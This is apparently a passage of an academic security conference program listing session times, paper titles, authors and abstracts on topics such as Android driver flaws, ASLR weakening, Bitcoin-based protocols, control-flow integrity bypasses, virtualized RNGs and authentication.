Apparently, Android phone manufacturers are under the perpetual pressure to move quickly on their new models, continuously customizing Android to fit their hardware. The security implications of this practice is less known, particularly when it comes to the changes made to Android's Linux device drivers, e.g., those for camera, GPS, NFC etc. In this paper, we report the first study aimed at better understanding of this security hazard. Our study is based on ADDICTED, a new tool we built for automatically detecting some types of flaws in customized driver protection. Specifically, on a customized phone, ADDICTED performs dynamic analysis to correlate the operations on a security-sensitive device to its related Linux files, and then determines whether those files are under-protected on the Linux layer by comparing them with their counterparts on an official Android OS. In this way, we can detect a set of likely security flaws on the phone. Using the tool, we analyzed three popular phones from Samsung, identified their likely flaws and built end-to-end attacks that allow an unprivileged app to take pictures and screenshots, and even log the keys the user enters through touchscreen. Some of those flaws are found to exist on over a hundred phone models and affect millions of users. We reported the flaws and are helping the manufacturer fix those problems. We further studied the security settings of device files on 2423 factory images from major phone manufacturers, discovered over 1,000 vulnerable images and also gained insights about how they are distributed across different Android versions, carriers and countries.
From Zygote to Morula: Fortifying Weakened ASLR on Android
Byoungyoung Lee (Georgia Institute of Technology), Long Lu (Stony Brook University), Tielei Wang (Georgia Institute of Technology), Taesoo Kim (Massachusetts Institute of Technology), and Wenke Lee (Georgia Institute of Technology)
Despite the ever increasing research efforts on securing Android applications and the high-level system mechanisms, not many works have investigated the security issues of the low-level OS designs, partially due to the belief that the security issues at this level may not differ much from those on Linux. However, we argue that certain Android’s modifications to the Linux design can be at odds with the security mechanisms and thus incur unique threats that are worth immediate attention. We discovered that a system design of Android for speeding up app launches, namely the Zygote process creation model, weakens ASLR because all app processes are created with largely identical memory layouts. We designed both remote and local attacks capable of bypassing the weakened ASLR and executing return-oriented programming on Android. We demonstrated the attacks using real apps, such as Chrome Browser and VLC Player. Further, we designed and implemented Morula, a secure replacement for Zygote. Morula introduces a very small amount of code to Android OS and can be easily adopted by device vendors. Our evaluation shows that, at a sole cost of 13 MB memory usage increase in each running app, Morula allows Android processes to have individually randomized memory layout and even a slightly shorter average launch time, compared to Zygote.

Break

02:45PM - 03:15PM

Session: E-Cash

03:15PM - 04:30PM

Best Paper Award

Secure Multiparty Computations on Bitcoin
Marcin Andrychowicz (University of Warsaw) , Stefan Dziembowski (University of Warsaw and Sapienza University of Rome) , Daniel Malinowski, and Łukasz Mazurek (University of Warsaw)
BitCoin is a decentralized digital currency, introduced in 2008, that has recently gained noticeable popularity. Its main features are: (a) it lacks a central authority that controls the transactions, (b) the list of transactions is publicly available, and (c) its syntax allows more advanced transactions than simply transferring the money. The goal of this paper is to show how these properties of BitCoin can be used in the area of secure multiparty computation protocols (MPCs).

Firstly, we show that the BitCoin system provides an attractive way to construct a version of 'timed commitments', where the committer has to reveal his secret within a certain time frame, or to pay a fine. This, in turn, can be used to obtain fairness in some multiparty protocols. Secondly, we introduce a concept of multiparty protocols that work 'directly on BitCoin'. Recall that the standard definition of the MPCs guarantees only that the protocol 'emulates the trusted third party'. Hence ensuring that the inputs are correct, and the outcome is respected is beyond the scope of the definition. Our observation is that the BitCoin system can be used to go beyond the standard 'emulation-based' definition, by constructing protocols that link their inputs and the outputs with the real BitCoin transactions.

As an instantiation of this idea we construct protocols for secure multiparty lotteries using the BitCoin currency, without relying on a trusted authority (one of these protocols uses the BitCoin-based timed commitments mentioned above). Our protocols guarantee fairness for the honest parties no matter how the looser behaves. For example: if one party interrupts the protocol then her money is lost and transferred to the honest participants. Our protocols are practical (to demonstrate it we performed their transactions in the actual BitCoin system), and can be used in real life as a replacement for the online gambling sites. We think that this paradigm can have also other applications. We discuss some of them.
Zerocash: Decentralized Anonymous Payments from Bitcoin
Eli Ben-Sasson (Technion), Alessandro Chiesa (MIT), Christina Garman, Matthew Green, and Ian Miers (Johns Hopkins University), Eran Tromer (Tel Aviv University), and Madars Virza (MIT)
Bitcoin provides a new vision for online payments based on a decentralized public transaction ledger. Unfortunately, Bitcoin and its descendants suffer from anonymity issues because much can be learned from the transaction-graph induced by this ledger. In this paper we propose a new approach to improving anonymity in financial systems based on decentralized public ledgers. Our protocol, which we call Zerocash, builds on the previous Zerocoin work of Miers et al. Unlike Zerocoin, which acts as a decentralized 'laundry', we show how to build a complete and working anonymous currency on top of the Bitcoin network. Specifically, Zerocash allows users to transact in a fully-anonymous manner without disclosing a payment’s origin, destination, amount, or links to other payments. Moreover, our protocol is orders of magnitude more efficient than Zerocoin, and is even competitive with Bitcoin. We achieve these results by leveraging recent advances in zero-knowledge Succinct Non-interactive ARguments of Knowledge (zk-SNARKs), as well as a new e-cash protocol. Finally, we implement our techniques and demonstrate that they can be deployed in practice.
PermaCoin: Repurposing Bitcoin Work for Data Preservation
Andrew Miller (University of Maryland), Ari Juels (none), Elaine Shi (University of Maryland), Bryan Parno (Microsoft Research), and Jonathan Katz (University of Maryland)
Bitcoin is widely regarded as the first broadly successful e-cash system. An oft-cited concern, though, is that the coin-mining process in Bitcoin wastes computational resources. Indeed, Bitcoin’s underlying mining mechanism, which we call a scratch-off puzzle (SOP), involves continuously attempting to solve computational puzzles that have no intrinsic utility.

We propose a modification to Bitcoin that repurposes its mining resources to achieve a more broadly useful goal: distributed storage of archival data. We call our new scheme PermaCoin. Unlike Bitcoin and its proposed alternatives, PermaCoin requires clients to invest not just computational resources, but also storage. Our scheme involves an alternative Scratch-Off Puzzle for Bitcoin based on Proofs-of-Retrievability (PORs). Successfully minting money with this SOP requires local, random access to a copy of a file. Given the competition among mining clients in Bitcoin, this modified SOP gives rise to highly decentralized file storage, thus reducing the overall waste of Bitcoin. Using a model of rational economic agents we show that our modified SOP preserves the essential properties of the original Bitcoin puzzle. We also provide parameterizations and calculations based on realistic hardware constraints to demonstrate the practicality of PermaCoin as a whole.

Break

04:30PM - 05:00PM

Short Talks

05:00PM - 06:00PM

A program for short talks is now available.

Security & Privacy Technical Committee Business Meeting

06:15PM - 07:15PM

May 21


Breakfast

07:00AM - 08:00AM

Closing Remarks

08:00AM - 08:15AM

Session: Miscellaneous

08:15AM - 10:00AM

Cloak and Swagger: Understanding Data Sensitivity Through the Lens of User Anonymity
Sai Teja Peddinti (Polytechnic Insitute of New York University) and Aleksandra Korolova, Elie Bursztein, and Geetanjali Sampemane (Google)
Most of what we understand about data sensitivity is through user self-report (e.g., surveys); this paper is the first to use behavioral data to determine content sensitivity, via the clues that users give as to what information they consider private or sensitive through their use of privacy enhancing product features. We perform a large-scale analysis of user anonymity choices during their activity on Quora, a popular question-and-answer site. We identify categories of questions for which users are more likely to exercise anonymity and explore several machine learning approaches towards predicting whether a particular answer will be written anonymously. Our findings validate the viability of the proposed approach towards an automatic assessment of data sensitivity, show that data sensitivity is a nuanced measure that should be viewed on a continuum rather than as a binary concept, and advance the idea that data-mining can be effectively used in order to develop product features that can help keep users safe.
Stopping a Rapid Tornado with a Puff
José Lopes and Nuno Neves (Faculdade de Ciências da Universidade de Lisboa)
RaptorQ is the most advanced fountain code proposed so far. Its properties make it attractive for forward error correction (FEC), offering high reliability at low overheads (i.e., for a small amount of repair information) and efficient encoding and decoding operations. Since RaptorQ's emergence, it has already been standardized by the IETF, and there is the expectation that it will be adopted by several other standardization bodies, in areas related to digital media broadcast, cellular networks, and satellite communications. The paper describes a new attack on RaptorQ that breaks the near ideal FEC performance, by carefully choosing which packets are allowed to reach the receiver. Furthermore, the attack was extended to be performed over secure channels with IPsec/ESP. The paper also proposes a few solutions to protect the code from the attack, which could be easily integrated into the implementations.
SoK: Security and Privacy in Implantable Medical Devices and Body Area Networks
Michael Rushanan (Johns Hopkins University), Colleen Swanson (University of Michigan), Denis Foo Kune (University of Michigan), and Aviel D. Rubin (Johns Hopkins University)
Balancing security, privacy, safety, and utility is a necessity in the health care domain, in which implantable medical devices (IMDs) and body area networks (BANs) have made it possible to continuously and automatically manage and treat a number of health conditions, ranging from cardiac arrhythmia to Parkinson’s. In this work, we provide a clear definition and overview of the problem space, categorizing relevant research results in academia with respect to threats and identifying trends, interdependencies, and directions for future research. We identify three broad research categories aimed at ensuring the security and privacy of the telemetry, software, and physiological sensing interface layers. We find that while the security of the telemetry interface has received much attention in academia, both the threat of software exploitation and the sensor interface layer deserve further attention. In addition, we identify areas of concern in current research, including common sources of confusion in utilizing the MIT PhysioNet portal for key establishment protocols and the use of human tissue simulators; we make concrete recommendations on appropriate methods for future work.
Quantifying Information Flow for Dynamic Secrets
Piotr Mardziel (University of Maryland, College Park), Mario Alvim (University of Pennsylvania), Michael Hicks (University of Maryland, College Park), and Michael Clarkson (George Washington University)
Quantitative information-flow models typically assume that secret information is static. But real-world secrets, such as mobile device locations and account passwords, evolve over time. So it's not just the current value of a secret that matters, but also how the secret changes. If information leaks about how secrets change, adversaries might be able to predict future (or past) secrets. Hiding the correlation between time and the value of a secret can even be more important than hiding the secret itself.
This paper formalizes information flow in the context of dynamic systems with adaptive adversaries, and shows how to quantify leakage of information about secrets and about how secrets change. Careful modeling of the adversary's resources, and his decision about when to attack a system, turns out to be essential. We give operational interpretations of our metrics, relative to well-defined attack scenarios and attacker capabilities.

Break

10:00AM - 10:30AM

Session: Attacks 3

10:30AM - 12:15PM

Not-So-Random Numbers in Virtualized Linux and the Whirlwind RNG
Adam Everspaugh, Yan Zhai, Robert Jellinek, Thomas Ristenpart, and Michael Swift (University of Wisconsin)
Virtualized environments are widely thought to cause problems for software-based random number generators (RNGs), due to use of virtual machine (VM) snapshots as well as fewer and believed-to-be lower quality entropy sources. Despite this, we are unaware of any published analysis of the security of critical RNGs when running in VMs. We fill this gap, using measurements of Linux's RNG systems (without the aid of hardware RNGs, the most common use case today) on Xen, VMware, and Amazon EC2. Despite CPU cycle counters providing a significant source of entropy, various deficiencies in the design of the Linux RNG makes its first output vulnerable during VM boots and, more critically, makes it suffer from catastrophic reset vulnerabilities. We show cases in which the RNG will output the exact same sequence of bits each time it is resumed from the same snapshot. This can compromise, for example, cryptographic secrets generated after resumption. We explore legacy-compatible countermeasures, as well as a clean-slate solution. The latter is a new RNG called Whirlwind that provides a simpler, more-secure solution for providing system randomness.
Out Of Control: Overcoming Control-Flow Integrity
Enes Göktaş (Vrije Universiteit Amsterdam), Elias Athanasopoulos (Columbia University), Herbert Bos (Vrije Universiteit Amsterdam), and Georgios Portokalidis (Stevens Institute of Technology)
As existing defenses like ALSR, DEP, and stack cookies are not sufficient to stop determined attackers from exploiting our software, interest in Control Flow Integrity (CFI) is growing. In its ideal form, CFI prevents any flow of control that was not intended by the original program, effectively putting a stop to exploitation based on return oriented programming (and many other attacks besides). Two main problems have prevented CFI from being deployed in practice. First, many CFI implementations require source code or debug information that is typically not available for commercial software. Second, in its ideal form, the technique is very expensive. It is for this reason that current research efforts focus on making CFI fast and practical. Specifically, much of the work on practical CFI is applicable to binaries, and improves performance by enforcing a looser notion of control flow integrity. In this paper, we examine the security implications of such looser notions of CFI: are they still able to prevent code reuse attacks, and if not, how hard is it to bypass its protection? Specifically, we show that with two new types of gadgets, return oriented programming is still possible. We assess the availability of our gadget sets, and demonstrate the practicality of these results with a practical exploit against Internet Explorer that bypasses modern CFI implementations.
Modeling and Discovering Vulnerabilities with Code Property Graphs
Fabian Yamaguchi (University of Goettingen), Nico Golde (Qualcomm Research Germany), and Daniel Arp and Konrad Rieck (University of Goettingen)
The vast majority of security breaches encountered today are a direct result of insecure code. Consequently, the protection of computer systems critically depends on the rigorous identification of vulnerabilities in software, a tedious and error-prone process requiring significant expertise. Unfortunately, a single flaw suffices to undermine the security of a system and thus the sheer amount of code to audit plays into the attacker's cards.

In this paper, we present a method for effectively mining large amounts of source code for vulnerabilities. To this end, we introduce a novel representation of source code called a code property graph that merges concepts of classic program analysis, namely abstract syntax trees, control flow graphs and program dependence graphs, into a joint data structure. This comprehensive representation enables us to elegantly model templates for common vulnerabilities with graph traversals that, for instance, can identify buffer overflows, integer overflows, format string vulnerabilities or memory address leaks. We implement our approach using a popular graph database and demonstrate its efficacy by identifying 18 previously unknown vulnerabilities in the source code of the Linux kernel.
SoK: Introspections on Trust and the Semantic Gap
Bhushan Jain, Mirza Basim Baig, Dongli Zhang, Donald E. Porter, and Radu Sion (Stony Brook University)
An essential goal of Virtual Machine Introspection (VMI) is assuring security policy enforcement and overall functionality in the presence of an untrustworthy OS. A fundamental obstacle to this goal is the difficulty in accurately extracting semantic meaning from the hypervisor’s hardware-level view of a guest OS, called the semantic gap. Over the twelve years since the semantic gap problem was identified, immense progress has been made in developing powerful VMI tools. Unfortunately, much of this progress has been made at the cost of reintroducing trust into the guest OS, often in direct contradiction to the underlying threat model motivating the introspection. Although this choice is reasonable in some contexts and has facilitated progress, the ultimate goal of reducing the trusted computing base of software systems is best served by a clear-eyed look at the VMI design space.

This paper organizes previous work on VMI based on the essential design considerations behind any VMI system, and then explains how these design choices dictate the trust model and security properties of the overall system. The paper then observes portions of the VMI design space which have been underexplored, as well as potential adaptations of existing techniques to bridge the semantic gap without trusting the guest OS. Overall, this paper aims to create an essential checkpoint in the broader quest of achieving meaningful trust in virtualized environments through VM introspection.

Lunch

12:15PM - 01:30PM

Session: Secure Computation and Storage

01:30PM - 02:45PM

Automating Efficient RAM-Model Secure Computation
Chang Liu, Yan Huang, Elaine Shi, Michael Hicks, and Jonathan Katz (University of Maryland, College Park)
We describe the first automated approach towards RAM-model secure computation. Towards this end, we define an intermediate representation called SCVM, and a corresponding type system for secure RAM-model computation. Leveraging compiletime optimizations, our approach achieves order-of-magnitude speedup in comparison with naive implementations of RAM-model secure computation.

Our approach fundamentally addresses the inherent limitations of circuit-model secure computation considered in almost all previous works. For programs containing dynamic memory accesses whose addresses dependent on secret inputs, existing circuit-model compilers must copy the entire data into the circuit for each dynamic memory access, which is prohibitive when the dataset is large. Our evaluation results show an order-of-magnitude speedup in comparison with the circuit model for reasonably large datasets — and the speedup will be even greater for larger datasets.
Dynamic Searchable Encryption via Blind Storage
Muhammad Naveed, Manoj Prabhakaran, and Carl A Gunter (University of Illinois at Urbana-Champaign)
Dynamic Searchable Symmetric Encryption allows a client to store a dynamic collection of encrypted documents with a server, and later quickly carry out keyword searches on these encrypted documents, while revealing minimal information to the server. In this paper we present a new dynamic SSE scheme that is simpler and more efficient than existing schemes while revealing less information to the server than prior schemes, achieving fully adaptive security against honest-but-curious servers.

We implemented a prototype of our scheme and demonstrated its efficiency on datasets from prior work. Apart from its concrete efficiency, our scheme is also simpler: in particular, it does not require the server to support any operation other than upload and download of data. Thus the server in our scheme can be based solely on a cloud storage service, rather than a cloud computation service as well, as in prior work. In building our dynamic SSE scheme, we introduce a new primitive called Blind Storage, which allows a client to store a set of files on a remote server in such a way that the server does not learn how many files are stored, or the lengths of the individual files; as each file is retrieved, the server learns about its existence (and can notice the same file being downloaded subsequently), but the file’s name and contents are not revealed. This is a primitive with several applications other than SSE, and is of independent interest.
Wysteria: A Programming Language for Generic, Mixed-mode Multiparty Computations
Aseem Rastogi, Matthew A. Hammer, and Michael Hicks (University of Maryland, College Park)
In a Secure Multiparty Computation (SMC), mutually distrusting parties use cryptographic techniques to cooperatively compute over their private data; in the process each party learns only explicitly revealed outputs. In this paper, we present Wysteria, a high-level programming language for writing SMCs. As with past languages, like Fairplay, Wysteria compiles secure computations to circuits that are executed by an underlying engine. Unlike past work, Wysteria provides support for mixed-mode programs, which combine local, private computations with synchronous SMCs. Wysteria complements a standard feature set with built-in support for secret shares and with wire bundles, a new abstraction that supports generic n-party computations. We have formalized Wysteria, its refinement type system, and its operational semantics. We show that Wysteria programs have an easy-to-understand single-threaded interpretation and prove that this view corresponds to the actual multi-threaded semantics. We also prove type soundness, a property we show has security ramifications, namely that information about one party's data can only be revealed to another via (agreed upon) secure computations. We have implemented Wysteria, and used it to program a variety of interesting SMC protocols from the literature, as well as several new ones. We find that Wysteria's performance is competitive with hand-rolled approaches while making programming far easier, and more trustworthy.

Break

02:45PM - 03:15PM

Session: Authentication

03:15PM - 04:30PM

An Expressive Model for the Web Infrastructure: Definition and Application to the BrowserID SSO System
Daniel Fett, Ralf Kuesters, and Guido Schmitz (University of Trier)
The web constitutes a complex infrastructure and as demonstrated by numerous attacks, rigorous analysis of standards and web applications is indispensable.

Inspired by successful prior work, in particular the work by Akhawe et al. as well as Bansal et al., in this work we propose a formal model for the web infrastructure. While unlike prior works, which aim at automatic analysis, our model so far is not directly amenable to automation, it is much more comprehensive and accurate with respect to the standards and specifications. As such, it can serve as a solid basis for the analysis of a broad range of standards and applications.

As a case study and another important contribution of our work, we use our model to carry out the first rigorous analysis of the BrowserID system (a.k.a. Mozilla Persona), a recently developed complex real-world single sign-on system that employs technologies such as AJAX, cross-document messaging, and HTML5 web storage. Our analysis revealed a number of very critical flaws that could not have been captured in prior models. We propose fixes for the flaws, formally state relevant security properties, and prove that the fixed system in a setting with a so-called secondary identity provider satisfies these security properties in our model. The fixes for the most critical flaws have already been adopted by Mozilla and our findings have been rewarded by the Mozilla Security Bug Bounty Program.
A Study of Probabilistic Password Models
Jerry Ma, Weining Yang, Min Luo, and Ninghui Li (Purdue University)
A probabilistic password model assigns a probability value to each string. Such models are useful for research into understanding what makes users choose more (or less) secure passwords, for password strength meters, and for password cracking. Guess number graphs are a widely used method in password research. In this paper, we show that probability-threshold graphs have important advantages over guess-number graphs. They are much faster to compute, and at the same time provide information beyond what is feasible in guess-number graphs, potentially leading to new findings. Curves in probability-threshold graphs correspond naturally to a numerical metric, the Average Negative Log Likelihood (ANLL), which is closely related to other widely used metrics in statistics and language modeling. Using this new and improved methodology, we conduct a systematic evaluation of a large number of probabilistic password models, including Markov models using different normalization and smoothing methods, and found that, among other things, Markov models, when done correctly, significantly outperform the Probabilistic Context-Free Grammar (PCFG) model proposed by Weir et al., which has been considered to be the state-of-the-art model.
ZEBRA: Zero-Effort Bilateral Recurring Authentication
Shrirang Mare and Andrés Molina-Markham (Dartmouth College), Cory Cornelius (Intel), and Ronald Peterson and David Kotz (Dartmouth College)
Common authentication methods based on passwords, tokens, or fingerprints perform one-time authentication and rely on users to log out from the computer terminal when they leave. Users, however, often forget to log out, which is a security risk. The most common solution, inactivity timeouts, inevitably fail security (too long a timeout) or usability (too short a timeout). One solution is to authenticate users continuously while they are using the terminal and automatically log them out when they leave. Several solutions are based on user proximity, but these are not sufficient: they only confirm whether the user is nearby but not whether the user is actually using the terminal. Proposed solutions based on behavioral biometric authentication (e.g., keystroke dynamics) may not be reliable, as a recent study suggests.

To address this problem we propose Zero-Effort Bilateral Recurring Authentication (ZEBRA). In ZEBRA, a user wears a bracelet (with a built-in accelerometer, gyroscope, and radio) on her dominant wrist. When the user interacts with a computer terminal the bracelet records the wrist movement, processes it, and sends it to the terminal. The terminal compares the wrist movement with the inputs it receives from the user (via keyboard and mouse), and confirms the continued presence of the user only if they correlate. Because the bracelet is on the same hand that provides inputs to the terminal, the accelerometer and gyroscope data and input events received by the terminal should correlate because their source is the same – the user’s hand movement. In our experiments ZEBRA performed continuous authentication with 85% accuracy in verifying the correct user and identified all adversaries within 11s. For a different value of a usability parameter ZEBRA correctly verified 90% users and identified all adversaries within 50s.

NITRD Cyber-Physical Security Panel

04:30PM - 06:00PM

Cyber-Physical Systems offer profound opportunities for innovation in many sectors our economy, but also present profound challenges for the seamless and secure integration of their computing and physical components. The joint NSF, DHS, and DOT solicitation in CPS is representative of the growing interest by the USG to support the development of the core science needed to engineer high-confidence CPS. Panelists will highlight cybersecurity challenges of CPS, promising R&D directions in solving those challenges, and outline research objectives for the security and CPS communities.

Panelists:
David Corman, Program Officer and CPS Lead, NSF/CISE
Victoria Pillitteri, Smart Grid Cybersecurity and Cyber-Physical Systems Security Lead, Chair, SGIP Cybersecurity Committee, NIST
Scott Tousley, Deputy Director, Cyber Security Division, DHS S&T
Mark (Mohammad) Tehranipoor, Associate Professor/ECE Dept, University of Connecticut, and Director UCONN CHASE Center and Comcast Center of Excellence in Security Innovation
Ulf Lindqvist, Director, Infrastructure Security Program, SRI International